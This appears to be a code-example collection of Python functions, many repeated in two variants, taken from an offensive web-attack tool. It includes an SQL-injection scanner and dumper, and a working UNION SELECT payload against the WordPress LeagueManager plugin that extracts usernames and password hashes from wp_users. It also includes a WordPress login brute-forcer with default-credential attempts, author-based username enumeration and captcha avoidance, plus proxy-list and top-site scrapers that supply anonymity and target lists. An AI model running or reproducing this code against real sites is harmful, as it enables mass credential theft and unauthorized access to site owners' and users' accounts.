Example #1
0
def base_scrape_alexa(url, browser_args, out_name, add_http):
    """Download a zip archive from ``url`` and extract ``top-1m.csv`` from it.

    The archive is fetched through ``Browser`` and the CSV member is extracted
    into ``out_dir``.  ``name``, ``out_dir`` and ``strip_open`` are not defined
    in this function and are expected to come from the enclosing module.

    Args:
        url: Location of the zip archive.
        browser_args: Keyword arguments forwarded to ``Browser``.
        out_name: File name (inside ``out_dir``) of the final output.
        add_http: When true, write one ``http://<second CSV column>`` line per
            input line; otherwise just rename the extracted CSV to ``out_name``.

    Returns:
        The number of lines returned by ``strip_open`` for the extracted CSV.
    """
    b = Browser(name, **browser_args)
    r = b.go(url)

    csv_file = 'top-1m.csv'
    z = ZipFile(StringIO(r.content), 'r')
    try:
        z.extract(csv_file, out_dir)
    finally:
        # Release the archive handle even if the member is missing.
        z.close()

    file_path = path.join(out_dir, csv_file)
    lines = strip_open(file_path)

    out_path = path.join(out_dir, out_name)
    if add_http:
        # The raw CSV is removed before writing, so out_name may equal csv_file.
        os.remove(file_path)
        with open(out_path, 'w+') as f:
            for line in lines:
                # f.write instead of ``print >> f`` so the same code also runs
                # on Python 3; the emitted bytes are unchanged.
                f.write('http://' + line.split(',')[1] + '\n')
    else:
        try:
            os.rename(file_path, out_path)
        except OSError:
            # Best effort: if the rename fails the extracted CSV simply stays
            # under its original name.
            pass

    return len(lines)
Example #2
0
def base_sqli_dump(num, browser_args, url, ident, left, right, attempts):
    """Request ``url`` with ``ident`` replaced by ``num`` and extract one value.

    The response text is searched for whatever sits between ``left`` and
    ``right``.  Returns the first capture, or ``attempts`` unchanged when the
    markers are not found.
    """
    browser = Browser(url, **browser_args)

    target = url.replace(ident, str(num))
    response = browser.go(target)

    # NOTE(review): left/right are interpolated into the pattern unescaped, so
    # regex metacharacters in them are interpreted as regex syntax.
    pattern = '{}(.*){}'.format(left, right)
    captured = findall(pattern, response.text)

    return captured[0] if captured else attempts
Example #3
0
def scan_js(url, browser_args):
    """Fetch ``url`` and list the absolute http(s) links in it ending in ``.js``.

    Args:
        url: Page to download.
        browser_args: Keyword arguments forwarded to ``Browser``.

    Returns:
        A list of matched link strings, in the order they appear in the
        response text.
    """
    b = Browser(name, **browser_args)
    r = b.go(url)

    # Raw literal: the pattern contains \( and \), which are invalid escape
    # sequences in a plain string literal on Python 3 (warning today, error in
    # the future).  The pattern value itself is unchanged.
    url_pattern = r'http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+]|[!*\(\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+'
    return [link for link in findall(url_pattern, r.text) if link.endswith('.js')]
Example #4
0
def base_sqli_dump(num, browser_args, url, ident, left, right, attempts):
    """Substitute ``num`` for ``ident`` in ``url``, fetch it and pull out a value.

    Returns:
        The first text captured between ``left`` and ``right`` in the response
        body, or the ``attempts`` argument as-is if nothing was captured.
    """
    session = Browser(url, **browser_args)
    reply = session.go(url.replace(ident, str(num)))

    # left and right become part of the regular expression verbatim.
    hits = findall('{}(.*){}'.format(left, right), reply.text)
    if not hits:
        return attempts
    return hits[0]
Example #5
0
def base_check_keyword(link, browser_args, keywords, check_url=False):
    """Fetch ``link`` and report whether any keyword occurs in the response.

    Args:
        link: URL to request.
        browser_args: Keyword arguments forwarded to ``Browser``.
        keywords: Iterable of substrings to look for.
        check_url: When true, the final response URL is searched as well.

    Returns:
        The response URL if a keyword was found, otherwise ``''``.
    """
    response = Browser(name, **browser_args).go(link)

    found_in_body = any(word in response.text for word in keywords)
    if found_in_body:
        return response.url

    # The URL is only consulted when the body did not match.
    if check_url and any(word in response.url for word in keywords):
        return response.url
    return ''
Example #6
0
def base_sqli_scan(url, browser_args):
    """Fetch ``url`` and return it if the body contains an SQL-error keyword pair.

    A pair counts as a hit only when both of its words occur in the response
    text.  The comparison is a plain, case-sensitive substring test.

    Returns:
        ``url`` on a hit, otherwise ``None``.
    """
    browser = Browser(name, **browser_args)

    keyword_pairs = (
        ('sql', 'syntax'),
        ('syntax', 'error'),
        ('sql', 'error'),
        ('query', 'failed'),
        ('incorrect', 'syntax'),
    )

    response = browser.go(url)

    for pair in keyword_pairs:
        if all(word in response.text for word in pair):
            return url
    return None
Example #7
0
def base_check_keyword(link, browser_args, keywords, check_url=False):
    """Return the response URL for ``link`` if a keyword is present, else ``''``.

    The response text is always searched; the response URL is searched too
    when ``check_url`` is true.
    """
    browser = Browser(name, **browser_args)
    reply = browser.go(link)

    def mentions_keyword(haystack):
        # True when at least one keyword is a substring of haystack.
        return any(keyword in haystack for keyword in keywords)

    if mentions_keyword(reply.text):
        return reply.url
    if check_url and mentions_keyword(reply.url):
        return reply.url
    return ''
Example #8
0
def scan_js(url, browser_args):
    """Download ``url`` and collect the http(s) URLs in its text ending in ``.js``.

    Args:
        url: Page to download.
        browser_args: Keyword arguments forwarded to ``Browser``.

    Returns:
        List of matching URL strings in order of appearance.
    """
    b = Browser(name, **browser_args)
    r = b.go(url)

    # A raw string keeps the regex escapes \( and \) out of Python's own
    # string-escape processing, which rejects them as invalid escapes on
    # Python 3.  The compiled pattern is identical.
    link_pattern = (
        r'http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+]|[!*\(\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+'
    )
    return [
        link for link in findall(link_pattern, r.text)
        if link.endswith('.js')
    ]
Example #9
0
def base_wp_leaguemanager(url, browser_args):
    """Send the LeagueManager export request to ``url`` and parse the reply.

    Returns:
        The two captured fields of the first matching row joined with ``':'``,
        or ``None`` when the response does not match.
    """
    browser = Browser(name, **browser_args)

    form = {}
    form['league_id'] = '7 UNION SELECT ALL user_login,2,3,4,5,6,7,8,9,10,11,12,13,user_pass,15,16,17,18,19,20,21,22,23,24 from wp_users--'
    form['mode'] = 'teams'
    form['leaguemanager_export'] = 'Download+File'

    response = browser.go(url, data=form)

    # The export is tab separated; the pattern is anchored on literal column
    # values from the request above.
    rows = findall('21\t(.*)\t2.*0\t(.*)\t15', response.text)
    if not rows:
        return None
    return ':'.join(rows[0])
Example #10
0
def base_check_proxy(proxy, browser_args, target_site, target_key):
    """Check whether ``proxy`` can fetch ``target_site`` correctly.

    Args:
        proxy: Proxy to route the request through.
        browser_args: Extra keyword arguments forwarded to ``Browser``.
        target_site: URL requested through the proxy.
        target_key: Substring that must appear in the response text.

    Returns:
        ``proxy`` when the response is OK and contains ``target_key``;
        ``None`` when the request raises or the check fails.
    """
    b = Browser(name, change_proxy=False, max_retries=2, max_timeouts=2, **browser_args)

    try:
        r = b.go(target_site, proxy=proxy)
    except Exception:
        # Deliberately broad: any failure just means the proxy is unusable.
        return None

    if r.ok and target_key in r.text:
        return proxy
    return None
Example #11
0
def wp_init(url, browser_args, job_name, out_name):
    """Submit the initial login form to ``url`` and queue the follow-up task.

    The form parameters come from ``base_wp_init``.  Depending on which marker
    (``WP_GDKEY`` / ``WP_BUSER``) appears in the response text, exactly one of
    ``celery_output``, ``wp_user`` or ``wp_brute`` is scheduled via ``.delay``.
    """
    params = base_wp_init(url, browser_args)

    response = Browser(name, **browser_args).go(url, data=params)

    if WP_GDKEY in response.text:
        # NOTE(review): `out` is not defined in this function; it must come
        # from module scope.  Confirm it is not meant to be `url`.
        celery_output.delay(out_format(out, params), name, job_name, out_name)
        return

    if WP_BUSER in response.text:
        wp_user.delay(url, browser_args, job_name, out_name, params)
        return

    wp_brute.delay(url, browser_args, job_name, out_name, params, 1)
Example #12
0
def wp_init(url, browser_args, job_name, out_name):
    """Post the form built by ``base_wp_init`` to ``url`` and dispatch a task.

    One task is queued with ``.delay`` per call:
    ``celery_output`` if ``WP_GDKEY`` is in the response text, ``wp_user`` if
    ``WP_BUSER`` is, and ``wp_brute`` otherwise.
    """
    form = base_wp_init(url, browser_args)

    browser = Browser(name, **browser_args)
    reply = browser.go(url, data=form)

    if WP_GDKEY in reply.text:
        # NOTE(review): `out` is resolved from outside this function; verify
        # that is intended (the function's own `url` looks like a candidate).
        formatted = out_format(out, form)
        celery_output.delay(formatted, name, job_name, out_name)
    elif WP_BUSER in reply.text:
        wp_user.delay(url, browser_args, job_name, out_name, form)
    else:
        wp_brute.delay(url, browser_args, job_name, out_name, form, 1)
Example #13
0
def base_scan_dom(url, browser_args):
    """Fetch ``url`` and run ``_scan_dom`` over its JavaScript.

    For a URL ending in ``.js`` the whole response text is scanned and the
    result of ``_scan_dom`` is returned directly.  Otherwise the response is
    parsed as HTML and the text of every ``<script>`` element is scanned.

    Returns:
        The ``_scan_dom`` result for a ``.js`` URL, else a list with the
        results for all script elements concatenated.
    """
    response = Browser(name, **browser_args).go(url)

    if url.endswith('.js'):
        return _scan_dom(response.text)

    document = html.document_fromstring(response.text)
    findings = []
    for script in document.xpath('//script'):
        findings += _scan_dom(script.text_content())
    return findings
Example #14
0
def base_scan_dom(url, browser_args):
    """Download ``url`` and collect ``_scan_dom`` matches from its scripts.

    A ``.js`` URL is scanned as a single script; anything else is parsed as an
    HTML document and each ``<script>`` element's text is scanned in turn.
    """
    browser = Browser(name, **browser_args)
    reply = browser.go(url)

    is_script = url.endswith('.js')
    if is_script:
        return _scan_dom(reply.text)

    collected = []
    tree = html.document_fromstring(reply.text)
    script_nodes = tree.xpath('//script')
    for node in script_nodes:
        source = node.text_content()
        collected.extend(_scan_dom(source))
    return collected
Example #15
0
def base_scrape_headers(link, browser_args, match):
    """Fetch ``link`` and return its response headers, optionally filtered.

    Args:
        link: URL to request.
        browser_args: Keyword arguments forwarded to ``Browser``.
        match: Iterable of header names to keep; if falsy, all headers are
            returned.

    Returns:
        A dict of headers.  When filtering, only names whose value is truthy
        are included.
    """
    response = Browser(name, **browser_args).go(link)
    headers = response.headers

    if not match:
        return dict(headers)

    looked_up = ((field, headers.get(field)) for field in match)
    return dict((field, value) for field, value in looked_up if value)
Example #16
0
def base_scrape_headers(link, browser_args, match):
    """Request ``link`` and return either all headers or the requested subset.

    With a falsy ``match`` the full header mapping is copied into a dict.
    Otherwise only the fields named in ``match`` that are present with a
    truthy value are returned.
    """
    browser = Browser(name, **browser_args)
    reply = browser.go(link)

    if not match:
        return dict(reply.headers)

    selected = {}
    for header_name in match:
        header_value = reply.headers.get(header_name)
        if not header_value:
            # Missing or empty header: leave it out of the result.
            continue
        selected[header_name] = header_value
    return selected
Example #17
0
def base_scrape_quantcast(num, browser_args):
    """Scrape one page of the Quantcast US top-sites listing.

    Args:
        num: Page number inserted into the listing URL.
        browser_args: Keyword arguments forwarded to ``Browser``.

    Returns:
        A list of ``"http://" + <link text>`` strings, one per ``href`` link
        with text inside the first element of class ``twoColumn``.

    Raises:
        IndexError: If the page has no element with class ``twoColumn``.
    """
    b = Browser(name, **browser_args)
    url = "http://www.quantcast.com/top-sites/US/{}".format(num)
    r = b.go(url)

    site = lxml.html.document_fromstring(r.text)
    site.make_links_absolute(r.url)
    links = site.find_class("twoColumn")[0]

    output = []
    for element, attribute, _uri, _pos in links.iterlinks():
        # element.text is None when the link has no leading text (for example
        # an anchor that only wraps child elements); concatenating it would
        # raise TypeError, so such links are skipped.
        if attribute == "href" and element.text is not None:
            output.append("http://" + element.text)
    return output
Example #18
0
def base_sqli_scan(url, browser_args):
    """Request ``url`` and flag it when the body looks like an SQL error.

    The body is flagged if, for at least one keyword pair, both words occur in
    the response text (case-sensitive substring match).

    Returns:
        ``url`` when flagged, ``None`` otherwise.
    """
    browser = Browser(name, **browser_args)

    error_signatures = [
        ['sql', 'syntax'],
        ['syntax', 'error'],
        ['sql', 'error'],
        ['query', 'failed'],
        ['incorrect', 'syntax'],
    ]

    reply = browser.go(url)

    def signature_present(words):
        # Every word of the signature must appear somewhere in the body.
        return all(word in reply.text for word in words)

    if any(signature_present(words) for words in error_signatures):
        return url
    return None
Example #19
0
def base_scrape_quantcast(num, browser_args):
    """Fetch page ``num`` of the Quantcast US top-sites list and extract sites.

    Args:
        num: Page number appended to the listing URL.
        browser_args: Keyword arguments forwarded to ``Browser``.

    Returns:
        List of ``'http://' + <link text>`` for every ``href`` link that has
        text within the first ``twoColumn`` element.

    Raises:
        IndexError: If no element with class ``twoColumn`` exists.
    """
    b = Browser(name, **browser_args)
    url = 'http://www.quantcast.com/top-sites/US/{}'.format(num)
    r = b.go(url)

    site = lxml.html.document_fromstring(r.text)
    site.make_links_absolute(r.url)
    links = site.find_class('twoColumn')[0]

    # Links whose element has no text (element.text is None) are skipped;
    # previously they raised TypeError on string concatenation.
    return [
        'http://' + element.text
        for element, attribute, _uri, _pos in links.iterlinks()
        if attribute == 'href' and element.text is not None
    ]
Example #20
0
def base_wp_leaguemanager(url, browser_args):
    """Issue the LeagueManager export request against ``url``.

    Returns:
        ``'<first capture>:<second capture>'`` built from the first row that
        matches the tab-separated pattern, or ``None`` if no row matches.
    """
    browser = Browser(name, **browser_args)

    league_id = '7 UNION SELECT ALL user_login,2,3,4,5,6,7,8,9,10,11,12,13,user_pass,15,16,17,18,19,20,21,22,23,24 from wp_users--'
    request_data = {
        'league_id': league_id,
        'mode': 'teams',
        'leaguemanager_export': 'Download+File',
    }
    reply = browser.go(url, data=request_data)

    matched_rows = findall('21\t(.*)\t2.*0\t(.*)\t15', reply.text)
    return ':'.join(matched_rows[0]) if matched_rows else None
Example #21
0
def base_scan_wp(url, browser_args):
    """Probe ``url`` for a login form that is not protected by a captcha.

    ``WP_LOGIN`` is joined onto ``url`` unless the URL already ends with it.

    Returns:
        The probed login URL when the response is OK, contains every
        ``WP_VALID`` marker and none of the ``WP_CAPCH`` markers; ``None``
        otherwise, including when the request raises.
    """
    WP_LOGIN = '******'
    WP_VALID = ['loginform']
    WP_CAPCH = ['cptch_block']

    browser = Browser(name, **browser_args)

    login_url = url if url.endswith(WP_LOGIN) else urljoin(url, WP_LOGIN)
    try:
        response = browser.go(login_url)
    except Exception:
        # Any request failure is treated as "no usable login page".
        return None

    if not response.ok:
        return None
    if not all(marker in response.text for marker in WP_VALID):
        return None
    if any(marker in response.text for marker in WP_CAPCH):
        return None
    return login_url
Example #22
0
def base_wp_init(url, browser_args):
    """Fetch the login page at ``url`` and build the initial form parameters.

    Args:
        url: Login page to download.
        browser_args: Keyword arguments forwarded to ``Browser``.

    Returns:
        A dict with ``log``, ``pwd`` and ``wp_submit`` set to their defaults,
        plus ``redirect_to`` and ``testcookie`` when the page contains a value
        for them.
    """
    b = Browser(name, **browser_args)
    r = b.go(url)

    params = {'log': 'admin', 'wp_submit': 'Log In', 'pwd': 'admin'}

    # Raw literal: the character class is full of regex escapes that are
    # invalid *string* escapes in a plain literal on Python 3.  The resulting
    # pattern text is unchanged.
    value_group = r'([\w\d\:\.\/\-\=\&\%\+;\_\?\#\;\,]*)'

    # Both hidden fields share the same '"<field>" value="..."' layout.
    for field in ('redirect_to', 'testcookie'):
        found = findall('"' + field + '" value="' + value_group + '"', r.text)
        if found:
            params[field] = found[0]

    return params
Example #23
0
def base_wp_init(url, browser_args):
    """Download ``url`` and assemble the parameters for a first login attempt.

    Args:
        url: Login page to download.
        browser_args: Keyword arguments forwarded to ``Browser``.

    Returns:
        Dict containing the default ``log`` / ``pwd`` / ``wp_submit`` values
        and, when found in the page, ``redirect_to`` and ``testcookie``.
    """
    b = Browser(name, **browser_args)
    r = b.go(url)

    params = {
        'log': 'admin',
        'wp_submit': 'Log In',
        'pwd': 'admin',
    }

    # Raw strings keep the regex escapes away from Python's string-escape
    # handling, which flags sequences such as \: or \/ as invalid on
    # Python 3.  The patterns themselves are unchanged.
    redirect = findall(
        r'"redirect_to" value="([\w\d\:\.\/\-\=\&\%\+;\_\?\#\;\,]*)"', r.text)
    testcook = findall(
        r'"testcookie" value="([\w\d\:\.\/\-\=\&\%\+;\_\?\#\;\,]*)"', r.text)

    if redirect:
        params['redirect_to'] = redirect[0]
    if testcook:
        params['testcookie'] = testcook[0]

    return params
Example #24
0
def base_scan_wp(url, browser_args):
    """Return the login URL derived from ``url`` if it serves a plain login form.

    The URL qualifies when the request succeeds with an OK response whose text
    has every ``WP_VALID`` marker and no ``WP_CAPCH`` marker.  In every other
    case, including a raised request error, the result is ``None``.
    """
    WP_LOGIN = '******'
    WP_VALID = ['loginform']
    WP_CAPCH = ['cptch_block']

    browser = Browser(name, **browser_args)

    if not url.endswith(WP_LOGIN):
        url = urljoin(url, WP_LOGIN)

    try:
        reply = browser.go(url)
    except Exception:
        return None

    def page_has(marker):
        return marker in reply.text

    looks_valid = reply.ok and all(page_has(m) for m in WP_VALID)
    if looks_valid and not any(page_has(m) for m in WP_CAPCH):
        return url
    return None
Example #25
0
def base_find_user(url, browser_args, params):
    """Look up the author name for ``?author=1`` and store it in ``params``.

    ``WP_LOGIN`` in ``url`` is replaced with ``?author=1``.  The name is taken
    from an ``author/<name>/`` segment of the final response URL, or failing
    that from an ``archive author author-<name>`` marker in the response text.

    Args:
        url: Login URL containing ``WP_LOGIN``.
        browser_args: Keyword arguments forwarded to ``Browser``.
        params: Form parameter dict; updated in place.

    Returns:
        ``params`` with ``log`` and ``pwd`` both set to the discovered name,
        or ``None`` when no name could be found.
    """
    WP_LOGIN = '******'
    b = Browser(name, **browser_args)

    url_author = url.replace(WP_LOGIN, '?author=1')
    r = b.go(url_author)

    user = ''
    if 'author/' in r.url:
        # A trailing '/' is appended so a URL ending in the name still matches.
        # The result is checked before indexing: 'author/' can be present
        # without a name that fits the pattern, which used to raise IndexError.
        from_url = findall(r'author\/([\d\w\-]+)\/', r.url + '/')
        if from_url:
            user = from_url[0]
    if not user and 'archive author author-' in r.text:
        from_body = findall(r'archive author author-([\d\w\-]+)', r.text)
        if from_body:
            user = from_body[0]
    if not user:
        return None

    params['log'] = user
    params['pwd'] = user
    return params
Example #26
0
def base_find_user(url, browser_args, params):
    """Discover the name behind ``?author=1`` and write it into ``params``.

    The request goes to ``url`` with ``WP_LOGIN`` swapped for ``?author=1``.
    The response URL is checked for ``author/<name>/`` first; the response
    text is checked for ``archive author author-<name>`` as a fallback.

    Args:
        url: Login URL containing ``WP_LOGIN``.
        browser_args: Keyword arguments forwarded to ``Browser``.
        params: Form parameter dict, mutated in place.

    Returns:
        The same ``params`` dict with ``log`` and ``pwd`` set to the name, or
        ``None`` if no name was found.
    """
    WP_LOGIN = '******'
    b = Browser(name, **browser_args)

    url_author = url.replace(WP_LOGIN, '?author=1')
    r = b.go(url_author)

    # Each source is only searched when its marker is present.  An empty
    # result falls through instead of being indexed, which previously raised
    # IndexError for URLs containing 'author/' without a matching name.
    candidates = []
    if 'author/' in r.url:
        candidates = findall(r'author\/([\d\w\-]+)\/', r.url + '/')
    if not candidates and 'archive author author-' in r.text:
        candidates = findall(r'archive author author-([\d\w\-]+)', r.text)
    if not candidates:
        return None

    user = candidates[0]
    params['log'] = user
    params['pwd'] = user
    return params
Example #27
0
def base_link_scraper(link, browser_args, past, include_external):
    """Fetch ``link`` and return the not-yet-seen ``href`` links on the page.

    Args:
        link: Page to download.
        browser_args: Keyword arguments forwarded to ``Browser``.
        past: List of URLs already seen.  It is mutated in place: ``link`` and
            every new ``href`` URI found on the page are appended.
        include_external: When false, only links whose host equals the host of
            the final response URL are returned.

    Returns:
        List of absolute URIs, in document order, that were not in ``past``
        and pass the ``include_external`` filter.
    """
    b = Browser(name, **browser_args)

    past.append(link)
    r = b.go(link)

    doc = lxml.html.document_fromstring(r.text)

    doc.make_links_absolute(r.url)
    root = urlparse(r.url).netloc
    output = []
    for _element, attribute, uri, _pos in doc.iterlinks():
        if attribute != 'href' or uri in past:
            continue
        past.append(uri)
        url_is_external = urlparse(uri).netloc != root

        # The decision is made per link.  The flag itself must not be
        # reassigned here: doing so made it stick to True after the first
        # internal link, letting every later external link through.
        if include_external or not url_is_external:
            output.append(uri)
    return output
Example #28
0
def base_scrape_proxy(num, browser_args):
    """Scrape page ``num`` of the hidemyass proxy list into ``ip:port`` strings.

    The page splits each address across several elements, some of which are
    hidden via CSS; this function reassembles the address from the visible
    pieces.

    Args:
        num: Page number inserted into the proxy-list URL.
        browser_args: Keyword arguments forwarded to ``Browser``.

    Returns:
        List of ``'<ip>:<port>'`` strings, one per table row processed.
    """
    b = Browser(name, **browser_args)
    url = 'http://hidemyass.com/proxy-list/{}'.format(num)
    r = b.go(url)

    doc = lxml.html.document_fromstring(r.text)
    table = doc.get_element_by_id('listtable')
    # First child is skipped -- presumably the header row; confirm against the page.
    rows = table.getchildren()[1:]

    ips = []
    for row in rows:
        columns = row.getchildren()
        # Port is the text of the third cell; the address parts live under the
        # first child of the second cell.
        port = columns[2].text_content().strip()
        info = columns[1].getchildren()[0].getchildren()
        # info[0] is serialized and treated as the style block below (the
        # regex further down looks for its closing </style> tag).
        # NOTE(review): lxml.html.tostring returns bytes on Python 3 unless
        # encoding='unicode' is passed; the str operations below assume str.
        style = lxml.html.tostring(info[0])

        # Collect the selectors of rules that mention 'none': text before '{'
        # with its first character dropped (presumably the leading '.' of a
        # class selector -- TODO confirm).
        bad_styles = []
        for css in style.splitlines()[1:-1]:
            if 'none' in css:
                bad_styles.append(css.split('{')[0][1:])

        ip = ''
        # Digits placed directly after the closing style tag are the first part.
        tricky_style = re.findall('<\/style>(\d{1,3})', style)
        if tricky_style:
            ip += tricky_style[0] + '.'
        for span in info[1:]:
            span_html = lxml.html.tostring(span)
            # Digits trailing a closing span/div tag (optionally after a dot).
            tricky_html = re.findall('(?:<\/span>|<\/div>)\.?(\d{1,3})',
                                     span_html)
            if tricky_html:
                ip += tricky_html[0] + '.'
            # Only elements that neither mention 'none' nor use one of the
            # collected selectors contribute their text.
            if 'none' not in span_html and not any(bad in span_html
                                                   for bad in bad_styles):
                span_text = span.text_content()
                if re.search('\d', span_text):
                    ip += span_text + '.'
        # Drop the trailing '.' left by the last appended part.
        ips.append(ip[:-1] + ':' + port)
    return ips
Example #29
0
def init_wp(self, my_link):
    """Run the initial login attempt for ``my_link`` and route the outcome.

    Links that already carry a password go straight to ``do_brute``.
    Otherwise the form from ``base_wp_init`` is posted to ``my_link.item``:

    * response lacks a ``WP_VALID`` marker -> nothing is queued;
    * response contains ``WP_GDKEY`` -> the formatted result is appended to
      ``self.output``;
    * response contains ``WP_BUSER`` -> ``base_find_user`` must supply new
      parameters, else nothing is queued;
    * otherwise the link is queued on ``self.to_input`` with its parameters.
    """
    if my_link.pwd:
        return do_brute(my_link)

    target = my_link.item
    try:
        form = base_wp_init(target, self.browser_args)
    except Exception as err:
        return self.error_catch('wp init', my_link, err)

    response = Browser(name, **self.browser_args).go(target, data=form)

    for marker in WP_VALID:
        if marker not in response.text:
            return None

    if WP_GDKEY in response.text:
        return self.output.append(out_format(target, form))

    if WP_BUSER in response.text:
        form = base_find_user(target, self.browser_args, form)
        if not form:
            return None

    my_link.params = form
    self.to_input.append(my_link)
Example #30
0
def init_wp(self, my_link):
    """Try the default login for ``my_link`` and decide what happens next.

    A link with ``pwd`` set is handed to ``do_brute``.  For any other link the
    parameters from ``base_wp_init`` are posted to ``my_link.item``; a failure
    while building them is reported through ``self.error_catch``.  Depending
    on the response the link is dropped, recorded in ``self.output``, or
    queued on ``self.to_input`` with the parameters to use.
    """
    if my_link.pwd:
        return do_brute(my_link)

    try:
        params = base_wp_init(my_link.item, self.browser_args)
    except Exception as exc:
        return self.error_catch('wp init', my_link, exc)

    browser = Browser(name, **self.browser_args)
    reply = browser.go(my_link.item, data=params)

    page_is_login = all(marker in reply.text for marker in WP_VALID)
    if not page_is_login:
        return None

    if WP_GDKEY in reply.text:
        # Login succeeded: record the result.
        return self.output.append(out_format(my_link.item, params))

    if WP_BUSER in reply.text:
        # The attempted user was rejected; look up a real one.
        params = base_find_user(my_link.item, self.browser_args, params)
        if not params:
            return None

    my_link.params = params
    self.to_input.append(my_link)
Example #31
0
def base_scrape_proxy(num, browser_args):
    """Return the proxies listed on page ``num`` of hidemyass as ``ip:port``.

    Each address on the page is scattered over several elements, some hidden
    through CSS rules; the visible fragments are stitched back together here.

    Args:
        num: Page number inserted into the proxy-list URL.
        browser_args: Keyword arguments forwarded to ``Browser``.

    Returns:
        List of ``"<ip>:<port>"`` strings, one per table row processed.
    """
    b = Browser(name, **browser_args)
    url = "http://hidemyass.com/proxy-list/{}".format(num)
    r = b.go(url)

    doc = lxml.html.document_fromstring(r.text)
    table = doc.get_element_by_id("listtable")
    # Skips the first child of the table -- presumably a header row; verify.
    rows = table.getchildren()[1:]

    ips = []
    for row in rows:
        columns = row.getchildren()
        # Third cell holds the port; the second cell's first child holds the
        # address fragments.
        port = columns[2].text_content().strip()
        info = columns[1].getchildren()[0].getchildren()
        # Serialized form of the first fragment, handled as the style block.
        # NOTE(review): on Python 3 lxml.html.tostring yields bytes by
        # default, which would break the str handling below.
        style = lxml.html.tostring(info[0])

        # Selectors of CSS rules containing "none": the text before "{" minus
        # its first character (assumed to be the "." of a class -- confirm).
        bad_styles = []
        for css in style.splitlines()[1:-1]:
            if "none" in css:
                bad_styles.append(css.split("{")[0][1:])

        ip = ""
        # A number directly after the closing style tag is the first fragment.
        tricky_style = re.findall("<\/style>(\d{1,3})", style)
        if tricky_style:
            ip += tricky_style[0] + "."
        for span in info[1:]:
            span_html = lxml.html.tostring(span)
            # A number following a closing span/div tag, optionally after ".".
            tricky_html = re.findall("(?:<\/span>|<\/div>)\.?(\d{1,3})", span_html)
            if tricky_html:
                ip += tricky_html[0] + "."
            # Text is used only if the element does not mention "none" and
            # uses none of the collected selectors.
            if "none" not in span_html and not any(bad in span_html for bad in bad_styles):
                span_text = span.text_content()
                if re.search("\d", span_text):
                    ip += span_text + "."
        # ip[:-1] removes the trailing "." from the last fragment.
        ips.append(ip[:-1] + ":" + port)
    return ips
Example #32
0
def base_wp_brute(url, browser_args, params):
    """Post ``params`` to ``url`` and report whether the login succeeded.

    Returns:
        ``url`` if ``WP_GDKEY`` occurs in the response text, else ``None``.
    """
    response = Browser(name, **browser_args).go(url, data=params)
    return url if WP_GDKEY in response.text else None
Example #33
0
def base_wp_brute(url, browser_args, params):
    """Submit one login attempt and return ``url`` when it was accepted.

    The attempt counts as accepted when the response text contains
    ``WP_GDKEY``; otherwise ``None`` is returned.
    """
    browser = Browser(name, **browser_args)
    reply = browser.go(url, data=params)

    accepted = WP_GDKEY in reply.text
    if not accepted:
        return None
    return url